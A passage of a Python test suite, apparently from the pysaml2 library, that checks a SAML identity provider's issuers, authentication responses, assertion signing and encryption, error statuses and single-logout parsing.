req_cert_str)
return cert_str, req_key_str
class TestServer1():
def setup_class(self):
self.server = Server("idp_conf")
conf = config.SPConfig()
conf.load_file("server_conf")
self.client = client.Saml2Client(conf)
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id12")
self.ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["derek@nyy.mlb.com"], "title": "The man"}
def teardown_class(self):
self.server.close()
def verify_assertion(self, assertion):
assert assertion
assert assertion[0].attribute_statement
ava = ava = get_ava(assertion[0])
assert ava ==\
{'mail': ['derek@nyy.mlb.com'], 'givenName': ['Derek'],
'sn': ['Jeter'], 'title': ['The man']}
def verify_encrypted_assertion(self, assertion, decr_text):
self.verify_assertion(assertion)
assert assertion[0].signature is None
assert re.search(
r':EncryptedAssertion><encas[0-9]:Assertion ([^ >]* )*xmlns:encas[0-9]="urn:oasis:names:tc:SAML:2.0:assertion"',
decr_text,
)
def verify_advice_assertion(self, resp, decr_text):
assert resp.assertion[0].signature is None
assert resp.assertion[0].advice.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(resp.assertion[0].advice.encrypted_assertion[0].extension_elements,
[saml, samlp])
self.verify_encrypted_assertion(assertion, decr_text)
def test_issuer(self):
issuer = self.server._issuer()
assert isinstance(issuer, saml.Issuer)
assert _eq(issuer.keyswv(), ["text", "format"])
assert issuer.format == saml.NAMEID_FORMAT_ENTITY
assert issuer.text == self.server.config.entityid
def test_assertion(self):
assertion = s_utils.assertion_factory(
subject=factory(
saml.Subject, text="_aaa",
name_id=factory(saml.NameID,
format=saml.NAMEID_FORMAT_TRANSIENT)),
attribute_statement=do_attribute_statement(
{
("", "", "sn"): ("Jeter", ""),
("", "", "givenName"): ("Derek", ""),
}
),
issuer=self.server._issuer(),
)
assert _eq(assertion.keyswv(), ['attribute_statement', 'issuer', 'id',
'subject', 'issue_instant', 'version'])
assert assertion.version == "2.0"
assert assertion.issuer.text == "urn:mace:example.com:saml:roland:idp"
#
assert assertion.attribute_statement
attribute_statement = assertion.attribute_statement
assert len(attribute_statement.attribute) == 2
attr0 = attribute_statement.attribute[0]
attr1 = attribute_statement.attribute[1]
if attr0.attribute_value[0].text == "Derek":
assert attr0.friendly_name == "givenName"
assert attr1.friendly_name == "sn"
assert attr1.attribute_value[0].text == "Jeter"
else:
assert attr1.friendly_name == "givenName"
assert attr1.attribute_value[0].text == "Derek"
assert attr0.friendly_name == "sn"
assert attr0.attribute_value[0].text == "Jeter"
subject = assertion.subject
assert _eq(subject.keyswv(), ["text", "name_id"])
assert subject.text == "_aaa"
assert subject.name_id.format == saml.NAMEID_FORMAT_TRANSIENT
def test_response(self):
response = response_factory(
in_response_to="_012345",
destination="https:#www.example.com",
status=s_utils.success_status_factory(),
assertion=s_utils.assertion_factory(
subject=factory(saml.Subject, text="_aaa",
name_id=saml.NAMEID_FORMAT_TRANSIENT),
attribute_statement=do_attribute_statement(
{
("", "", "sn"): ("Jeter", ""),
("", "", "givenName"): ("Derek", ""),
}
),
issuer=self.server._issuer(),
),
issuer=self.server._issuer(),
)
print(response.keyswv())
assert _eq(response.keyswv(), ['destination', 'assertion', 'status',
'in_response_to', 'issue_instant',
'version', 'issuer', 'id'])
assert response.version == "2.0"
assert response.issuer.text == "urn:mace:example.com:saml:roland:idp"
assert response.destination == "https:#www.example.com"
assert response.in_response_to == "_012345"
#
status = response.status
print(status)
assert status.status_code.value == samlp.STATUS_SUCCESS
def test_parse_faulty_request(self):
req_id, authn_request = self.client.create_authn_request(
destination="http://www.example.com", id="id1")
# should raise an error because faulty spentityid
binding = BINDING_HTTP_REDIRECT
htargs = self.client.apply_binding(
binding, "%s" % authn_request, "http://www.example.com", "abcd")
_dict = parse_qs(htargs["headers"][0][1].split('?')[1])
print(_dict)
with raises(OtherError):
self.server.parse_authn_request(_dict["SAMLRequest"][0], binding)
def test_parse_faulty_request_to_err_status(self):
req_id, authn_request = self.client.create_authn_request(
destination="http://www.example.com")
binding = BINDING_HTTP_REDIRECT
htargs = self.client.apply_binding(binding, "%s" % authn_request,
"http://www.example.com", "abcd")
_dict = parse_qs(htargs["headers"][0][1].split('?')[1])
print(_dict)
try:
self.server.parse_authn_request(_dict["SAMLRequest"][0], binding)
status = None
except OtherError as oe:
print(oe.args)
status = s_utils.error_status_factory(oe)
assert status
print(status)
assert _eq(status.keyswv(), ["status_code", "status_message"])
assert status.status_message.text == 'Not destined for me!'
status_code = status.status_code
assert _eq(status_code.keyswv(), ["status_code", "value"])
assert status_code.value == samlp.STATUS_RESPONDER
assert status_code.status_code.value == samlp.STATUS_UNKNOWN_PRINCIPAL
def test_parse_ok_request(self):
req_id, authn_request = self.client.create_authn_request(
message_id="id1",
destination="http://localhost:8088/sso",
nameid_format=saml.NAMEID_FORMAT_TRANSIENT,
)
print(authn_request)
binding = BINDING_HTTP_REDIRECT
htargs = self.client.apply_binding(binding, "%s" % authn_request,
"http://www.example.com", "abcd")
_dict = parse_qs(htargs["headers"][0][1].split('?')[1])
print(_dict)
req = self.server.parse_authn_request(_dict["SAMLRequest"][0], binding)
# returns a dictionary
print(req)
resp_args = self.server.response_args(req.message, [BINDING_HTTP_POST])
assert resp_args["destination"] == "http://lingon.catalogix.se:8087/"
assert resp_args["in_response_to"] == "id1"
name_id_policy = resp_args["name_id_policy"]
assert _eq(name_id_policy.keyswv(), ["format"])
assert name_id_policy.format == saml.NAMEID_FORMAT_TRANSIENT
assert resp_args[
"sp_entity_id"] == "urn:mace:example.com:saml:roland:sp"
def test_sso_response_with_identity(self):
name_id = self.server.ident.transient_nameid(
"https://example.com/sp", "id12")
resp = self.server.create_authn_response(
{
"eduPersonEntitlement": "Short stop",
"sn": "Jeter",
"givenName": "Derek",
"mail": "derek.jeter@nyy.mlb.com",
"title": "The man"
},
"id12", # in_response_to
"http://localhost:8087/", # destination
"https://example.com/sp", # sp_entity_id
name_id=name_id,
authn=AUTHN
)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'assertion',
'in_response_to', 'issue_instant',
'version', 'id', 'issuer'])
assert resp.destination == "http://localhost:8087/"
assert resp.in_response_to == "id12"
assert resp.status
assert resp.status.status_code.value == samlp.STATUS_SUCCESS
assert resp.assertion
assertion = resp.assertion
print(assertion)
assert assertion.authn_statement
assert assertion.conditions
assert assertion.attribute_statement
attribute_statement = assertion.attribute_statement
print(attribute_statement)
assert len(attribute_statement[0].attribute) == 4
# Pick out one attribute
attr = None
for attr in attribute_statement[0].attribute:
if attr.friendly_name == "givenName":
break
assert len(attr.attribute_value) == 1
assert attr.name == "urn:mace:dir:attribute-def:givenName"
assert attr.name_format == "urn:oasis:names:tc:SAML:2.0:attrname-format:basic"
value = attr.attribute_value[0]
assert value.text.strip() == "Derek"
assert value.get_type() == "xs:string"
assert assertion.subject
assert assertion.subject.name_id
assert assertion.subject.subject_confirmation
confirmation = assertion.subject.subject_confirmation[0]
print(confirmation.keyswv())
print(confirmation.subject_confirmation_data)
assert confirmation.subject_confirmation_data.in_response_to == "id12"
def test_sso_response_without_identity(self):
resp = self.server.create_authn_response(
{},
"id12", # in_response_to
"http://localhost:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
userid="USER1",
authn=AUTHN,
release_policy=Policy(),
best_effort=True
)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'in_response_to',
'issue_instant', 'version', 'id', 'issuer',
'assertion'])
assert resp.destination == "http://localhost:8087/"
assert resp.in_response_to == "id12"
assert resp.status
assert resp.status.status_code.value == samlp.STATUS_SUCCESS
assert resp.issuer.text == "urn:mace:example.com:saml:roland:idp"
assert not resp.assertion.attribute_statement
def test_sso_response_specific_instant(self):
_authn = AUTHN.copy()
_authn["authn_instant"] = 1234567890
resp = self.server.create_authn_response(
{},
"id12", # in_response_to
"http://localhost:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
userid="USER1",
authn=_authn,
best_effort=True
)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'in_response_to',
'issue_instant', 'version', 'id', 'issuer',
'assertion'])
authn_statement = resp.assertion.authn_statement[0]
assert authn_statement.authn_instant == '2009-02-13T23:31:30Z'
def test_sso_failure_response(self):
exc = s_utils.MissingValue("eduPersonAffiliation missing")
resp = self.server.create_error_response(
"id12", "http://localhost:8087/", exc)
print(resp.keyswv())
assert _eq(resp.keyswv(), ['status', 'destination', 'in_response_to',
'issue_instant', 'version', 'id', 'issuer'])
assert resp.destination == "http://localhost:8087/"
assert resp.in_response_to == "id12"
assert resp.status
print(resp.status)
assert resp.status.status_code.value == samlp.STATUS_RESPONDER
assert resp.status.status_code.status_code.value == \
samlp.STATUS_REQUEST_UNSUPPORTED
assert resp.status.status_message.text == \
"eduPersonAffiliation missing"
assert resp.issuer.text == "urn:mace:example.com:saml:roland:idp"
assert not resp.assertion
def test_authn_response_0(self):
conf = config.SPConfig()
conf.load_file("server_conf")
self.client = client.Saml2Client(conf)
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["derek@nyy.mlb.com"], "title": "The man"}
npolicy = samlp.NameIDPolicy(format=saml.NAMEID_FORMAT_TRANSIENT,
allow_create="true")
resp_str = "%s" % self.server.create_authn_response(
ava, "id1", "http://local:8087/",
"urn:mace:example.com:saml:roland:sp", npolicy,
"foba0001@example.com", authn=AUTHN)
response = samlp.response_from_string(resp_str)
print(response.keyswv())
assert _eq(response.keyswv(), ['status', 'destination', 'assertion',
'in_response_to', 'issue_instant',
'version', 'issuer', 'id'])
print(response.assertion[0].keyswv())
assert len(response.assertion) == 1
assert _eq(response.assertion[0].keyswv(), ['attribute_statement',
'issue_instant', 'version',
'subject', 'conditions',
'id', 'issuer',
'authn_statement'])
assertion = response.assertion[0]
assert len(assertion.attribute_statement) == 1
astate = assertion.attribute_statement[0]
print(astate)
assert len(astate.attribute) == 4
def test_signed_response(self):
name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id12")
ava = {"givenName": ["Derek"], "sn": ["Jeter"],
"mail": ["derek@nyy.mlb.com"], "title": "The man"}
signed_resp = self.server.create_authn_response(
ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=name_id,
sign_assertion=True
)
print(signed_resp)
assert signed_resp
sresponse = response_from_string(signed_resp)
# It's the assertions that are signed not the response per se
assert len(sresponse.assertion) == 1
assertion = sresponse.assertion[0]
# Since the reponse is created dynamically I don't know the signature
# value. Just that there should be one
assert assertion.signature.signature_value.text != ""
def test_signed_response_1(self):
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=sresponse.assertion[0].id)
assert valid
self.verify_assertion(sresponse.assertion)
def test_signed_response_2(self):
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=False,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
assert sresponse.assertion[0].signature == None
def test_signed_response_3(self):
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=True,
)
sresponse = response_from_string(signed_resp)
assert sresponse.signature == None
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=sresponse.assertion[0].id)
assert valid
self.verify_assertion(sresponse.assertion)
def test_encrypted_signed_response_1(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(
signed_resp, self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id
)
assert valid
valid = self.server.sec.verify_signature(
signed_resp, self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=sresponse.assertion[0].id
)
assert valid
key_fd = make_temp(cert_key_str, decode=False)
decr_text = self.server.sec.decrypt(signed_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
assert resp.assertion[0].advice.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(
resp.assertion[0].advice.encrypted_assertion[0].extension_elements,
[saml, samlp])
self.verify_assertion(assertion)
#PEFIM never signs assertions.
assert assertion[0].signature is None
#valid = self.server.sec.verify_signature(decr_text,
# self.server.config.cert_file,
# node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
# node_id=assertion[0].id)
assert valid
def test_encrypted_signed_response_2(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
decr_text_old = copy.deepcopy("%s" % signed_resp)
with raises(DecryptError):
decr_text = self.server.sec.decrypt(
signed_resp,
self.client.config.encryption_keypairs[0]["key_file"],
)
decr_text = self.server.sec.decrypt(signed_resp, self.client.config.encryption_keypairs[1]["key_file"])
assert decr_text != decr_text_old
resp = samlp.response_from_string(decr_text)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
assert resp.assertion[0].signature == None
self.verify_assertion(resp.assertion)
def test_encrypted_signed_response_3(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=False,
encrypt_cert_assertion=cert_str,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
key_fd = make_temp(cert_key_str, decode=False)
decr_text = self.server.sec.decrypt(signed_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
valid = self.server.sec.verify_signature(decr_text,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=resp.assertion[0].id)
assert valid
self.verify_assertion(resp.assertion)
assert 'xmlns:encas' not in decr_text
def test_encrypted_signed_response_4(self):
cert_str, cert_key_str = generate_cert()
signed_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=True,
sign_assertion=True,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str,
)
sresponse = response_from_string(signed_resp)
valid = self.server.sec.verify_signature(signed_resp,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:protocol:Response',
node_id=sresponse.id)
assert valid
decr_text = self.server.sec.decrypt(signed_resp, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
valid = self.server.sec.verify_signature(decr_text,
self.server.config.cert_file,
node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
node_id=resp.assertion[0].id)
assert valid
key_fd = make_temp(cert_key_str, decode=False)
decr_text = self.server.sec.decrypt(decr_text, key_fd.name)
resp = samlp.response_from_string(decr_text)
assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
assertion = \
extension_elements_to_elements(assertion[0].advice.encrypted_assertion[0].extension_elements,[saml, samlp])
self.verify_assertion(assertion)
#PEFIM never signs assertion in advice
assert assertion[0].signature is None
#valid = self.server.sec.verify_signature(decr_text,
# self.server.config.cert_file,
# node_name='urn:oasis:names:tc:SAML:2.0:assertion:Assertion',
# node_id=assertion[0].id)
assert valid
def test_encrypted_response_1(self):
cert_str_advice, cert_key_str_advice = generate_cert()
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str_advice,
)
_resp = "%s" % _resp
sresponse = response_from_string(_resp)
assert sresponse.signature is None
key_fd = make_temp(cert_key_str_advice, decode=False)
decr_text = self.server.sec.decrypt(_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
self.verify_advice_assertion(resp, decr_text)
def test_encrypted_response_2(self):
cert_str_advice, cert_key_str_advice = generate_cert()
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str_advice,
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text_1 = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
key_fd = make_temp(cert_key_str_advice, decode=False)
decr_text_2 = self.server.sec.decrypt(decr_text_1, key_fd.name)
resp = samlp.response_from_string(decr_text_2)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_advice_assertion(resp, decr_text_2)
def test_encrypted_response_3(self):
cert_str_assertion, cert_key_str_assertion = generate_cert()
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
encrypt_cert_assertion=cert_str_assertion
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
key_fd = make_temp(cert_key_str_assertion, decode=False)
decr_text = self.server.sec.decrypt(_resp, key_fd.name)
resp = samlp.response_from_string(decr_text)
assert resp.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_encrypted_assertion(assertion, decr_text)
def test_encrypted_response_4(self):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text)
assert resp.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_encrypted_assertion(assertion, decr_text)
def test_encrypted_response_5(self):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True
)
_resp = "%s" % _resp
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text)
self.verify_advice_assertion(resp, decr_text)
def test_encrypted_response_6(self):
_server = Server("idp_conf_verify_cert")
cert_str_advice, cert_key_str_advice = generate_cert()
cert_str_assertion, cert_key_str_assertion = generate_cert()
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice=cert_str_advice,
encrypt_cert_assertion=cert_str_assertion
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
key_fd1 = make_temp(cert_key_str_assertion, decode=False)
decr_text_1 = _server.sec.decrypt(_resp, key_fd1.name)
key_fd2 = make_temp(cert_key_str_advice, decode=False)
decr_text_2 = _server.sec.decrypt(decr_text_1, key_fd2.name)
resp = samlp.response_from_string(decr_text_2)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_advice_assertion(resp, decr_text_2)
def test_encrypted_response_7(self):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True
)
sresponse = response_from_string(_resp)
assert sresponse.signature is None
decr_text_1 = self.server.sec.decrypt(_resp, self.client.config.encryption_keypairs[1]["key_file"])
decr_text_2 = self.server.sec.decrypt(decr_text_1, self.client.config.encryption_keypairs[1]["key_file"])
resp = samlp.response_from_string(decr_text_2)
resp.assertion = extension_elements_to_elements(resp.encrypted_assertion[0].extension_elements, [saml, samlp])
self.verify_advice_assertion(resp, decr_text_2)
def test_encrypted_response_8(self):
with raises(EncryptError):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
encrypt_cert_assertion="whatever"
)
with raises(EncryptError):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
)
with raises(EncryptError):
_resp = self.server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
encrypt_cert_assertion="whatever"
)
_server = Server("idp_conf_verify_cert")
with raises(CertificateError):
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
encrypt_cert_assertion="whatever"
)
with raises(CertificateError):
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True,
encrypt_cert_advice="whatever",
)
with raises(CertificateError):
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
encrypt_cert_assertion="whatever"
)
def test_encrypted_response_9(self):
_server = Server("idp_conf_sp_no_encrypt")
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
pefim=True,
)
self.verify_assertion(_resp.assertion.advice.assertion)
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=False,
encrypt_assertion_self_contained=True,
pefim=True
)
self.verify_assertion(_resp.assertion.advice.assertion)
_resp = _server.create_authn_response(
self.ava,
"id12", # in_response_to
"http://lingon.catalogix.se:8087/", # consumer_url
"urn:mace:example.com:saml:roland:sp", # sp_entity_id
name_id=self.name_id,
sign_response=False,
sign_assertion=False,
encrypt_assertion=True,
encrypt_assertion_self_contained=True,
encrypted_advice_attributes=False,
)
self.verify_assertion([_resp.assertion])
def test_slo_http_post(self):
soon = time_util.in_a_while(days=1)
sinfo = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": soon,
"user": {
"givenName": "Leo",
"sn": "Laport",
}
}
self.client.users.add_information_about_person(sinfo)
req_id, logout_request = self.client.create_logout_request(
destination="http://localhost:8088/slop", name_id=nid,
issuer_entity_id="urn:mace:example.com:saml:roland:idp",
reason="I'm tired of this")
intermed = base64.b64encode(str(logout_request).encode('utf-8'))
#saml_soap = make_soap_enveloped_saml_thingy(logout_request)
request = self.server.parse_logout_request(intermed, BINDING_HTTP_POST)
assert request
def test_slo_soap(self):
soon = time_util.in_a_while(days=1)
sinfo = {
"name_id": nid,
"issuer": "urn:mace:example.com:saml:roland:idp",
"not_on_or_after": soon,
"user": {
"givenName": "Leo",
"sn": "Laport",
}
}
sp = client.Saml2Client(config_file="server_conf")
sp.users.add_information_about_person(sinfo)
req_id, logout_request = sp.create_logout_request(
name_id=nid, destination="http://localhost:8088/slo",
issuer_entity_id="urn:mace:example.com:saml:roland:idp",
reason="I'm tired of this")
#_ = s_utils.deflate_and_base64_encode("%s" % (logout_request,))
saml_soap = make_soap_enveloped_saml_thingy(logout_request)
self.server.ident.close()
with closing(Server("idp_soap_conf")) as idp:
request = idp.parse_logout_request(saml_soap)
idp.ident.close()
assert request
# ------------------------------------------------------------------------
class TestServer1NonAsciiAva():
def setup_class(self):
self.server = Server("idp_conf")
conf = config.SPConfig()
conf.load_file("server_conf")
self.client = client.Saml2Client(conf)
self.name_id = self.server.ident.transient_nameid(
"urn:mace:example.com:saml:roland:sp", "id12")
self.ava = {"givenName": ["Dave"], "sn": ["Concepción"],
"mail": ["dave@cnr.mlb.com"], "title": "#13"}
def teardown_class(self):
self.server.close()
def verify_assertion(self, assertion):
assert assertion
assert assertion[0].attribute_statement
ava = get_ava(assertion[0])
assert ava == \
{"givenName": ["Dave"], "sn": [u"Concepción"],
"mail": ["dave@cnr.mlb.com"], "title": ["#13"]}
def verify_encrypted_assertion(self, assertion, decr_text):
self.verify_assertion(assertion)
assert assertion[0].signature is None
assert re.search(
r':EncryptedAssertion><encas[0-9]:Assertion ([^ >]* )*xmlns:encas[0-9]="urn:oasis:names:tc:SAML:2.0:assertion"',
decr_text,
)
def verify_advice_assertion(self, resp, decr_text):
assert resp.assertion[0].signature is None
assert resp.assertion[0].advice.encrypted_assertion[0].extension_elements
assertion = extension_elements_to_elements(resp.assertion[0].advice.encrypted_assertion[0].extension_elements,
[saml, samlp])
self.verify_encrypted_assertion(assertion, decr_text)
def test_issuer(self):
issuer = self.server._issuer()
assert isinstance(issuer, saml.Issuer)
assert _eq(issuer.keyswv(), ["text", "format"])
assert issuer.format == saml.NAMEID_FORMAT_ENTITY
assert issuer.text == self.server.config.entityid
def test_assertion(self):
assertion = s_utils.assertion_factory(
subject=factory(
saml.Subject, text="_aaa",
name_id=factory(saml.NameID,
format=saml.NAMEID_FORMAT_TRANSIENT)),
attribute_statement=do_attribute_statement(
{
("", "", "sn"): ("Jeter", ""),
("", "", "givenName"): ("Derek", ""),
}
),
issuer=self.server._issuer(),
)
assert _eq(assertion.keyswv(), ['attribute_statement', 'issuer', 'id',
'subject', 'issue_instant', 'version'])
